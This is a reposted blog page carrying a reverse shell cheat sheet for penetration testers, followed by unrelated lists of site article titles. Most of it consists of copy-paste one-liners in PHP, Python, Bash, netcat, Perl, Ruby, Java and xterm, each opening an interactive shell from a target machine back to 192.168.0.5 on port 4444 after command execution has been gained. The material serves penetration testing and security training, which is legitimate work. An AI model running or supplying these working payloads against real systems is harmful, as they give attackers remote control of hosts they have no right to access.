本文来自:https://www.hacking.land/2019/03/reverse-shell-cheat-sheet.html?m=1

前言

If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell.

If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding a shell to a TCP port. This page deals with the former.

Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared.

The examples shown are tailored to Unix-like systems. Some of the examples below should also work on Windows if you use substitute “/bin/sh -i” with “cmd.exe”.

Each of the methods below is aimed to be a one-liner that you can copy/paste. As such they’re quite short lines, but not very readable.

PHP

php -r '$sock=fsockopen("192.168.0.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bash

bash -i >& /dev/tcp/192.168.0.5/4444 0>&1

Netcat

nc -e /bin/sh 192.168.0.5 4444

Perl

perl -e 'use Socket;$i="192.168.0.5";$p=4545;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby

ruby -rsocket -e'f=TCPSocket.open("192.168.0.5",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.5/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

xterm

xterm -display 192.168.0.5:4444

最新文章

  1. 浅谈cssText
  2. tomcat启动超时问题
  3. hashmap先按照value从大到小排序,value相等时按照key从小到大排序
  4. 切割haproxy的日志
  5. Scala 深入浅出实战经典 第81讲:Scala中List的构造是的类型约束逆变、协变、下界详解
  6. Arrays.sort(new String[]{&quot;aaa&quot;}); 排序方法
  7. 获取局域网ip
  8. Android Sqlite数据库执行插入查询更新删除的操作对比
  9. db2 表空间容器调整
  10. [SQL基础教程] 3-4 对查询结果进行排序/ORDER BY
  11. h5分享页面打开APP
  12. Vue 非父子组件通信
  13. Thread 调用方法的方式
  14. 视频客观质量评价工具:MSU Video Quality Measurement Tool【ssim,psnr】
  15. Python猫荐书系列:文也深度学习,理也深度学习
  16. 51nod 1035 最长的循环节
  17. js 常用代码
  18. CrashHandler
  19. BZOJ5311,CF321E 贞鱼
  20. python 09

热门文章

  1. ABAP 委外采购收货调用过账bapi
  2. 你不能只会flex居中布局,精制动画讲解所有flex布局方式!通俗易懂纯干货教程!...
  3. vue table刷新单行数据
  4. react+routerv6搭建项目
  5. The table‘xxxx’is full
  6. .net core格式化响应数据(json驼峰格式)
  7. HANDLE和HMOUDLE、HWND讲解
  8. Spring 自定义注解 操作日志
  9. taskkill报taskkill不是内部或者外部命令,也不是可运行程序
  10. K8s validating data: the server could not find the requested resource ... with --validate=false